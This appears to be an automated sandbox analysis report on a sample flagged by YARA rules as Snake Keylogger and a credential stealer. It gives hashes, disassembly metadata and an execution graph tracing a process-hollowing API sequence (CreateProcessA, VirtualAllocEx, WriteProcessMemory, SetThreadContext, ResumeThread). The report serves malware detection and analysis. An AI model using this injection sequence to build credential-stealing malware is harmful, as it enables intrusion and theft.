                                                      Imagebase:0xb70000
                                                      File size:854'528 bytes
                                                      MD5 hash:FF53D6A04EA8618890F7A81E31BD8A22
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:10.6%
                                                        Dynamic/Decrypted Code Coverage:98.8%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:254
                                                        Total number of Limit Nodes:13
                                                        execution_graph 39899 7617dd0 39901 7617f5b 39899->39901 39903 7617df6 39899->39903 39900 7617f96 39901->39900 39909 76180e1 39901->39909 39903->39901 39905 7614038 39903->39905 39906 7618050 PostMessageW 39905->39906 39908 76180bc 39906->39908 39908->39903 39910 76180a9 PostMessageW 39909->39910 39912 76180ea 39909->39912 39911 76180bc 39910->39911 39911->39900 39651 ded1b4 39653 ded1cc 39651->39653 39652 ded226 39653->39652 39656 50628e8 39653->39656 39662 50628f8 39653->39662 39657 5062925 39656->39657 39658 5062957 39657->39658 39668 5062a80 39657->39668 39673 5062a7c 39657->39673 39678 5062b4c 39657->39678 39663 5062925 39662->39663 39664 5062957 39663->39664 39665 5062a80 2 API calls 39663->39665 39666 5062b4c 2 API calls 39663->39666 39667 5062a7c 2 API calls 39663->39667 39665->39664 39666->39664 39667->39664 39670 5062a94 39668->39670 39669 5062b20 39669->39658 39684 5062b34 39670->39684 39688 5062b38 39670->39688 39675 5062a94 39673->39675 39674 5062b20 39674->39658 39676 5062b34 2 API calls 39675->39676 39677 5062b38 2 API calls 39675->39677 39676->39674 39677->39674 39679 5062b5a 39678->39679 39680 5062b0a 39678->39680 39682 5062b34 2 API calls 39680->39682 39683 5062b38 2 API calls 39680->39683 39681 5062b20 39681->39658 39682->39681 39683->39681 39685 5062b39 39684->39685 39686 5062b49 39685->39686 39691 5063f73 39685->39691 39686->39669 39689 5062b49 39688->39689 39690 5063f73 2 API calls 39688->39690 39689->39669 39690->39689 39695 5063f90 39691->39695 39699 5063fa0 39691->39699 39692 5063f8a 39692->39686 39696 5063fa0 39695->39696 39697 506403a CallWindowProcW 39696->39697 39698 5063fe9 39696->39698 39697->39698 39698->39692 39700 5063fe2 39699->39700 39702 5063fe9 39699->39702 39701 506403a CallWindowProcW 39700->39701 39700->39702 39701->39702 39702->39692 39609 295d158 39610 295d19e 39609->39610 39614 295d327 39610->39614 39617 295d338 39610->39617 39611 295d28b 39615 295d366 39614->39615 39620 295b410 39614->39620 39615->39611 39618 295b410 DuplicateHandle 39617->39618 39619 295d366 39618->39619 39619->39611 39621 295d3a0 DuplicateHandle 39620->39621 39622 295d436 39621->39622 39622->39615 39623 295acc8 39624 295acd7 39623->39624 39626 295adb0 39623->39626 39627 295add1 39626->39627 39628 295adf4 39626->39628 39627->39628 39635 295b420 39627->39635 39639 295b448 39627->39639 39643 295b458 39627->39643 39628->39624 39629 295adec 39629->39628 39630 295aff8 GetModuleHandleW 39629->39630 39631 295b025 39630->39631 39631->39624 39636 295b421 39635->39636 39647 295b048 39636->39647 39640 295b46c 39639->39640 39641 295b491 39640->39641 39642 295b048 LoadLibraryExW 39640->39642 39641->39629 39642->39641 39644 295b46c 39643->39644 39645 295b048 LoadLibraryExW 39644->39645 39646 295b491 39644->39646 39645->39646 39646->39629 39648 295b618 LoadLibraryExW 39647->39648 39650 295b491 39648->39650 39650->39629 39913 2954668 39914 295467a 39913->39914 39915 2954686 39914->39915 39917 2954779 39914->39917 39918 295479d 39917->39918 39922 2954888 39918->39922 39926 2954878 39918->39926 39924 29548af 39922->39924 39923 295498c 39923->39923 39924->39923 39930 29544b0 39924->39930 39928 2954888 39926->39928 39927 295498c 39928->39927 39929 29544b0 CreateActCtxA 39928->39929 39929->39927 39931 2955918 CreateActCtxA 39930->39931 39933 29559db 39931->39933 39703 7616c0e 39704 7616b9c 39703->39704 39706 7616c11 39703->39706 39705 7616bca 39704->39705 39724 761736c 39704->39724 39733 7617568 39704->39733 39738 7617765 39704->39738 39743 76171e2 39704->39743 39752 7617143 39704->39752 39761 7617541 39704->39761 39766 761759f 39704->39766 39770 761729f 39704->39770 39779 761763f 39704->39779 39784 761755c 39704->39784 39789 76172fd 39704->39789 39794 7616ff4 39704->39794 39799 7617314 39704->39799 39804 7617333 39704->39804 39808 76171d0 39704->39808 39813 7617390 39704->39813 39822 7617490 39704->39822 39725 76172e3 39724->39725 39726 7617466 39725->39726 39831 7615b00 39725->39831 39835 7615af8 39725->39835 39727 7617a01 39726->39727 39839 7615bc0 39726->39839 39843 7615bb9 39726->39843 39727->39727 39728 76177a1 39734 7617549 39733->39734 39847 7617d79 39734->39847 39852 7617d88 39734->39852 39735 7617a31 39739 7617780 39738->39739 39741 7615bc0 WriteProcessMemory 39739->39741 39742 7615bb9 WriteProcessMemory 39739->39742 39740 76177a1 39741->39740 39742->39740 39744 761714a 39743->39744 39746 7617466 39744->39746 39748 7615b00 VirtualAllocEx 39744->39748 39749 7615af8 VirtualAllocEx 39744->39749 39745 7617a01 39746->39745 39750 7615bc0 WriteProcessMemory 39746->39750 39751 7615bb9 WriteProcessMemory 39746->39751 39747 76177a1 39748->39746 39749->39746 39750->39747 39751->39747 39753 7617149 39752->39753 39754 7617466 39753->39754 39759 7615b00 VirtualAllocEx 39753->39759 39760 7615af8 VirtualAllocEx 39753->39760 39755 7617a01 39754->39755 39757 7615bc0 WriteProcessMemory 39754->39757 39758 7615bb9 WriteProcessMemory 39754->39758 39755->39755 39756 76177a1 39757->39756 39758->39756 39759->39754 39760->39754 39762 7617549 39761->39762 39764 7617d79 2 API calls 39762->39764 39765 7617d88 2 API calls 39762->39765 39763 7617a31 39764->39763 39765->39763 39768 7615bc0 WriteProcessMemory 39766->39768 39769 7615bb9 WriteProcessMemory 39766->39769 39767 76175cd 39768->39767 39769->39767 39771 761714a 39770->39771 39772 7617466 39771->39772 39777 7615b00 VirtualAllocEx 39771->39777 39778 7615af8 VirtualAllocEx 39771->39778 39773 76170e2 39772->39773 39775 7615bc0 WriteProcessMemory 39772->39775 39776 7615bb9 WriteProcessMemory 39772->39776 39773->39705 39774 76177a1 39775->39774 39776->39774 39777->39772 39778->39772 39780 7617549 39779->39780 39782 7617d79 2 API calls 39780->39782 39783 7617d88 2 API calls 39780->39783 39781 7617a31 39782->39781 39783->39781 39785 7617670 39784->39785 39865 7615cb0 39785->39865 39869 7615ca9 39785->39869 39786 7617692 39790 76174f3 39789->39790 39792 7615bc0 WriteProcessMemory 39790->39792 39793 7615bb9 WriteProcessMemory 39790->39793 39791 76176fb 39792->39791 39793->39791 39795 7616ffe 39794->39795 39873 7615e48 39795->39873 39877 7615e3d 39795->39877 39800 7617321 39799->39800 39802 7617d79 2 API calls 39800->39802 39803 7617d88 2 API calls 39800->39803 39801 7617a31 39802->39801 39803->39801 39881 7615a20 39804->39881 39885 7615a28 39804->39885 39805 761734d 39809 76177fa 39808->39809 39889 7617c70 39809->39889 39894 7617c5f 39809->39894 39810 7617813 39815 761739d 39813->39815 39817 761714a 39813->39817 39814 7617a01 39815->39814 39820 7615bc0 WriteProcessMemory 39815->39820 39821 7615bb9 WriteProcessMemory 39815->39821 39816 76177a1 39817->39815 39818 7615b00 VirtualAllocEx 39817->39818 39819 7615af8 VirtualAllocEx 39817->39819 39818->39815 39819->39815 39820->39816 39821->39816 39823 76174a2 39822->39823 39825 7617442 39822->39825 39829 7615b00 VirtualAllocEx 39823->39829 39830 7615af8 VirtualAllocEx 39823->39830 39824 7617a01 39825->39824 39827 7615bc0 WriteProcessMemory 39825->39827 39828 7615bb9 WriteProcessMemory 39825->39828 39826 76177a1 39827->39826 39828->39826 39829->39825 39830->39825 39832 7615b40 VirtualAllocEx 39831->39832 39834 7615b7d 39832->39834 39834->39726 39836 7615b00 VirtualAllocEx 39835->39836 39838 7615b7d 39836->39838 39838->39726 39840 7615c08 WriteProcessMemory 39839->39840 39842 7615c5f 39840->39842 39842->39728 39844 7615bc0 WriteProcessMemory 39843->39844 39846 7615c5f 39844->39846 39846->39728 39848 7617d9d 39847->39848 39857 7615540 39848->39857 39861 761553a 39848->39861 39849 7617db0 39849->39735 39853 7617d9d 39852->39853 39855 7615540 ResumeThread 39853->39855 39856 761553a ResumeThread 39853->39856 39854 7617db0 39854->39735 39855->39854 39856->39854 39858 7615580 ResumeThread 39857->39858 39860 76155b1 39858->39860 39860->39849 39862 7615540 ResumeThread 39861->39862 39864 76155b1 39862->39864 39864->39849 39866 7615cfb ReadProcessMemory 39865->39866 39868 7615d3f 39866->39868 39868->39786 39870 7615cb0 ReadProcessMemory 39869->39870 39872 7615d3f 39870->39872 39872->39786 39874 7615ed1 CreateProcessA 39873->39874 39876 7616093 39874->39876 39876->39876 39878 7615e48 CreateProcessA 39877->39878 39880 7616093 39878->39880 39880->39880 39882 7615a28 Wow64SetThreadContext 39881->39882 39884 7615ab5 39882->39884 39884->39805 39886 7615a6d Wow64SetThreadContext 39885->39886 39888 7615ab5 39886->39888 39888->39805 39890 7617c85 39889->39890 39892 7615a20 Wow64SetThreadContext 39890->39892 39893 7615a28 Wow64SetThreadContext 39890->39893 39891 7617c9b 39891->39810 39892->39891 39893->39891 39895 7617c85 39894->39895 39897 7615a20 Wow64SetThreadContext 39895->39897 39898 7615a28 Wow64SetThreadContext 39895->39898 39896 7617c9b 39896->39810 39897->39896 39898->39896 39934 7617f9e 39935 7617f90 39934->39935 39936 7617f96 39935->39936 39937 76180e1 PostMessageW 39935->39937 39937->39936

                                                        Executed Functions

                                                        Function 073F2889 Relevance: 4.0, Strings: 3, Instructions: 279COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 407 73f2889-73f2894 408 73f28bc-73f28e4 407->408 409 73f2896-73f28b7 407->409 411 73f2907-73f2933 408->411 412 73f28e6-73f2906 408->412 409->408 414 73f293a-73f29b0 411->414 415 73f2935 411->415 412->411 420 73f29b3 414->420 415->414 421 73f29ba-73f29d6 420->421 422 73f29df-73f29e0 421->422 423 73f29d8 421->423 424 73f2b2e-73f2b9e 422->424 423->420 423->422 423->424 425 73f29fc-73f2a3b 423->425 426 73f2a87-73f2ab1 423->426 427 73f2ab6-73f2aec 423->427 428 73f29e5-73f29fa 423->428 429 73f2b12-73f2b29 423->429 430 73f2af1-73f2b0d 423->430 431 73f2a40-73f2a44 423->431 432 73f2a70-73f2a82 423->432 446 73f2ba0 call 73f41fc 424->446 447 73f2ba0 call 73f3f65 424->447 448 73f2ba0 call 73f4184 424->448 449 73f2ba0 call 73f3bf0 424->449 425->421 426->421 427->421 428->421 429->421 430->421 433 73f2a57-73f2a5e 431->433 434 73f2a46-73f2a55 431->434 432->421 439 73f2a65-73f2a6b 433->439 434->439 439->421 445 73f2ba6-73f2bb0 446->445 447->445 448->445 449->445
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q$)"
                                                        • API String ID: 0-4031938444
                                                        • Opcode ID: 7fe38c786a11313152ffc422937dbbdd7dd6661cdec4a3c7903ca0eed6e5ec85
                                                        • Instruction ID: 5d113280b506c5ab73b9e14c678793802c519998bc11a8b3fc5d27aa1285abf0
                                                        • Opcode Fuzzy Hash: 7fe38c786a11313152ffc422937dbbdd7dd6661cdec4a3c7903ca0eed6e5ec85
                                                        • Instruction Fuzzy Hash: 51A125B1E14209CFDB08CFA9D8806DEFBB2FF89311F24912AD419AB355D7345A46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F2910 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 524 73f2910-73f2933 525 73f293a-73f29b0 524->525 526 73f2935 524->526 531 73f29b3 525->531 526->525 532 73f29ba-73f29d6 531->532 533 73f29df-73f29e0 532->533 534 73f29d8 532->534 535 73f2b2e-73f2b9e 533->535 534->531 534->533 534->535 536 73f29fc-73f2a3b 534->536 537 73f2a87-73f2ab1 534->537 538 73f2ab6-73f2aec 534->538 539 73f29e5-73f29fa 534->539 540 73f2b12-73f2b29 534->540 541 73f2af1-73f2b0d 534->541 542 73f2a40-73f2a44 534->542 543 73f2a70-73f2a82 534->543 557 73f2ba0 call 73f41fc 535->557 558 73f2ba0 call 73f3f65 535->558 559 73f2ba0 call 73f4184 535->559 560 73f2ba0 call 73f3bf0 535->560 536->532 537->532 538->532 539->532 540->532 541->532 544 73f2a57-73f2a5e 542->544 545 73f2a46-73f2a55 542->545 543->532 550 73f2a65-73f2a6b 544->550 545->550 550->532 556 73f2ba6-73f2bb0 557->556 558->556 559->556 560->556
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q$)"
                                                        • API String ID: 0-4031938444
                                                        • Opcode ID: ae8a154ed9887b0560189cba0ccf51010a771cfe0e982f7dde7351ea4dbee00a
                                                        • Instruction ID: 9d875688859445e66b3a5a2c3bdf1a49625356ab9a64fdc78acbdf95b30bf459
                                                        • Opcode Fuzzy Hash: ae8a154ed9887b0560189cba0ccf51010a771cfe0e982f7dde7351ea4dbee00a
                                                        • Instruction Fuzzy Hash: 3581C4B4E00209CFDB48CFAAC984AAEFBB2FF89310F14942AD519AB354D7349945CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F49C1 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tIh
                                                        • API String ID: 0-443931868
                                                        • Opcode ID: f9fa82bc4a5c3728c54ee4e60ace3c5d295939cb7957e1a14e07283d3643a3e8
                                                        • Instruction ID: 1f0a17b9b1161b3474da231e797047b3dcdb9d43e14c7829548c51665e7ec9bc
                                                        • Opcode Fuzzy Hash: f9fa82bc4a5c3728c54ee4e60ace3c5d295939cb7957e1a14e07283d3643a3e8
                                                        • Instruction Fuzzy Hash: 5BF19DB1A1424ACFDB04CFE9D4808EEFBB1FF89351B50A566D515AB202D7349A82CFD4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F4AB0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tIh
                                                        • API String ID: 0-443931868
                                                        • Opcode ID: ca5cc5870f560d33d6480505ada5845a5452166c064cbe97546fd4771fa5263e
                                                        • Instruction ID: d285fdb749660a038f511448caca82be2943e882354de40823b88665da2c6efe
                                                        • Opcode Fuzzy Hash: ca5cc5870f560d33d6480505ada5845a5452166c064cbe97546fd4771fa5263e
                                                        • Instruction Fuzzy Hash: 5AD158B0D1024ADFDB08CFD9D4808AEFBB6FF8A341B50D159D519AB215D734AA82CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05066880 Relevance: .8, Instructions: 795COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1664124841.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5060000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c041ac925b10a6a130fee740255ae7d4dd74f14655d848f87ed4a648c0410fb5
                                                        • Instruction ID: 735453700bea69222b1816cc2fb7d0923258a70049f774eaf1013adc86fa1e9d
                                                        • Opcode Fuzzy Hash: c041ac925b10a6a130fee740255ae7d4dd74f14655d848f87ed4a648c0410fb5
                                                        • Instruction Fuzzy Hash: 6982E574A00218CFCB14DF68C994AD9BBB2FF99301F1181E9E549AB361DB71AE85CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05066870 Relevance: .7, Instructions: 723COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1664124841.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5060000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ff441cb6abd64c6f215315fe4ebfed74a94b703d24df4bfd999dc0a4bcffc1f
                                                        • Instruction ID: 0b4f177a50ff39b8a5724253f64337dda9c6dffc299463eb312818fa97b6d72d
                                                        • Opcode Fuzzy Hash: 8ff441cb6abd64c6f215315fe4ebfed74a94b703d24df4bfd999dc0a4bcffc1f
                                                        • Instruction Fuzzy Hash: 2572F634A00218CFCB15DF64C998AD9BBB2FF99301F1181E9E549AB361DB71AE85CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07619180 Relevance: .6, Instructions: 591COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7ac49267f5da324b93f5a40006d6099ed61cb7a56e6aeb273466434912ef7d6
                                                        • Instruction ID: 041634ac595db170d8124c3dcd4cc12fe8cf4d30be48ad60aceeda8ec3486155
                                                        • Opcode Fuzzy Hash: c7ac49267f5da324b93f5a40006d6099ed61cb7a56e6aeb273466434912ef7d6
                                                        • Instruction Fuzzy Hash: D622AAB0B012458FDB19DB79D568BAE7BF7AF89700F284469E4069B3A0CB35ED01CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7F50 Relevance: .2, Instructions: 239COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 075094bc8222c5cd8d24824ec26f43e8c313085811669ad22c335620ac8f1290
                                                        • Instruction ID: 7c10ee6737f2403337f84ea7215faa903dfcdbdd52e8bc0a862cd8bf0331d1bb
                                                        • Opcode Fuzzy Hash: 075094bc8222c5cd8d24824ec26f43e8c313085811669ad22c335620ac8f1290
                                                        • Instruction Fuzzy Hash: 9CA157B0D15209EFDB08CFA5D5809DDFBF6BB8A340F60A41AE51ABB224D7349906CF11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7C38 Relevance: .2, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5513969f57e6053f17f49af7d73cc33b44f51d09fe43e179d778df1eccda450f
                                                        • Instruction ID: bd32f912b6ba038e61bcb6c75bcd40c387e31cb8c8772d7b5cf538c554253267
                                                        • Opcode Fuzzy Hash: 5513969f57e6053f17f49af7d73cc33b44f51d09fe43e179d778df1eccda450f
                                                        • Instruction Fuzzy Hash: 568143B4E14219CFDB04CFA9C9809EEFBB2FF89350F40946AD505A7254D7389A52CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F7C48 Relevance: .2, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 56375c3923b9fc8f377951fe191e754fd07d2f5dd0b72a5036cc170184318f81
                                                        • Instruction ID: a4809ac4eb501fb9a475e95300197518cb655ca8634d52fb0845e68253f65d1f
                                                        • Opcode Fuzzy Hash: 56375c3923b9fc8f377951fe191e754fd07d2f5dd0b72a5036cc170184318f81
                                                        • Instruction Fuzzy Hash: 958120B4E10229CFDB04CFA9C9809EEBBB2FF89350F50956AD905A7254D7389A42CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0761001E Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ffa567e8ad5bd49c39dd0169c466d52638da41ec7f89dbfa35209080f59c826f
                                                        • Instruction ID: 0359f17e76b5aadf3c2aff8f8f5b7e7c681104e7a36ec7f926677b82e8c901e7
                                                        • Opcode Fuzzy Hash: ffa567e8ad5bd49c39dd0169c466d52638da41ec7f89dbfa35209080f59c826f
                                                        • Instruction Fuzzy Hash: 7A31FAB1D056588FDB19CFA6C8543DEBFB2AFCA300F18C0AAD409BA265DB750949CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07610040 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac2c54660e0865efb76fbe2e79ee6903b58d751e508d0b0abda3eed039edc841
                                                        • Instruction ID: 4a8f906a3c33e7a47056f73daddd5fc1d38d6bad21cf4f7bd7c55711124886b9
                                                        • Opcode Fuzzy Hash: ac2c54660e0865efb76fbe2e79ee6903b58d751e508d0b0abda3eed039edc841
                                                        • Instruction Fuzzy Hash: 9331C7B0D14658CBEB18CFABC8587EEBBB6AFC9301F14C42AD40A76254DB740986CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F3BF0 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec9f0b4837a6dad8bb04252b11462e7b15caf5e313497ff74fe9cc9166d426e5
                                                        • Instruction ID: 734c8d741ac655066bfc21a5e34e3be7857f20d79aa1b7d6654e59f633a6978e
                                                        • Opcode Fuzzy Hash: ec9f0b4837a6dad8bb04252b11462e7b15caf5e313497ff74fe9cc9166d426e5
                                                        • Instruction Fuzzy Hash: 44211BB1E016588BEB18CFAAD9402DEFBF3AFC9310F14C16AD408A6264DB341A55CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F04E0 Relevance: 16.5, Strings: 13, Instructions: 282COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 295 73f04e0 296 73f04e5-73f04e8 295->296 297 73f04fa-73f04fe 296->297 298 73f04ea 296->298 310 73f0521 297->310 311 73f0500-73f0509 297->311 298->297 299 73f082c-73f0856 298->299 300 73f07aa-73f07af 298->300 301 73f087a-73f088e 298->301 302 73f0678-73f067c 298->302 303 73f06c7-73f06da 298->303 304 73f07b4-73f07ca 298->304 305 73f05d4-73f05d8 298->305 306 73f0763-73f076b 298->306 307 73f05b3-73f05bd 298->307 308 73f0891-73f089a 298->308 309 73f0770-73f0783 298->309 385 73f0858 299->385 386 73f0862-73f086c 299->386 300->296 312 73f069f 302->312 313 73f067e-73f0687 302->313 314 73f089d-73f08b3 303->314 341 73f06e0-73f06e8 303->341 346 73f07cc-73f07de 304->346 347 73f07e0 304->347 316 73f05fb 305->316 317 73f05da-73f05e3 305->317 306->296 307->314 315 73f05c3-73f05cf 307->315 338 73f0785-73f078c 309->338 339 73f07a3-73f07a8 309->339 320 73f0524-73f0526 310->320 318 73f050b-73f050e 311->318 319 73f0510-73f051d 311->319 326 73f06a2-73f06c2 312->326 324 73f068e-73f069b 313->324 325 73f0689-73f068c 313->325 315->296 333 73f05fe-73f0602 316->333 329 73f05ea-73f05f7 317->329 330 73f05e5-73f05e8 317->330 332 73f051f 318->332 319->332 321 73f053e-73f055b 320->321 322 73f0528-73f052e 320->322 363 73f057e 321->363 364 73f055d-73f0566 321->364 335 73f0532-73f053c 322->335 336 73f0530 322->336 337 73f069d 324->337 325->337 326->296 340 73f05f9 329->340 330->340 332->320 344 73f0618 333->344 345 73f0604-73f0616 333->345 335->321 336->321 337->326 338->314 354 73f0792-73f0799 338->354 355 73f079e 339->355 340->333 357 73f070b 341->357 358 73f06ea-73f06f3 341->358 348 73f061b-73f061f 344->348 345->348 349 73f07e3-73f07f0 346->349 347->349 359 73f0621-73f062a 348->359 360 73f0640 348->360 379 73f0808-73f0815 349->379 380 73f07f2-73f07f8 349->380 354->355 355->296 361 73f070e-73f0710 357->361 365 73f06fa-73f0707 358->365 366 73f06f5-73f06f8 358->366 367 73f062c-73f062f 359->367 368 73f0631-73f0634 359->368 372 73f0643-73f0664 360->372 370 73f072e 361->370 371 73f0712-73f0718 361->371 375 73f0581-73f05aa call 73f1807 363->375 373 73f056d-73f057a 364->373 374 73f0568-73f056b 364->374 377 73f0709 365->377 366->377 378 73f063e 367->378 368->378 383 73f0730-73f0732 370->383 381 73f071e-73f072a 371->381 382 73f071a-73f071c 371->382 372->314 400 73f066a-73f0673 372->400 384 73f057c 373->384 374->384 404 73f05b0 375->404 377->361 378->372 379->314 391 73f081b-73f0827 379->391 388 73f07fc-73f07fe 380->388 389 73f07fa 380->389 390 73f072c 381->390 382->390 393 73f074c-73f075e 383->393 394 73f0734-73f073a 383->394 384->375 397 73f085d 385->397 386->314 398 73f086e-73f0878 386->398 388->379 389->379 390->383 391->296 393->296 401 73f073e-73f074a 394->401 402 73f073c 394->402 397->296 398->397 400->296 401->393 402->393 404->307
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-1437089595
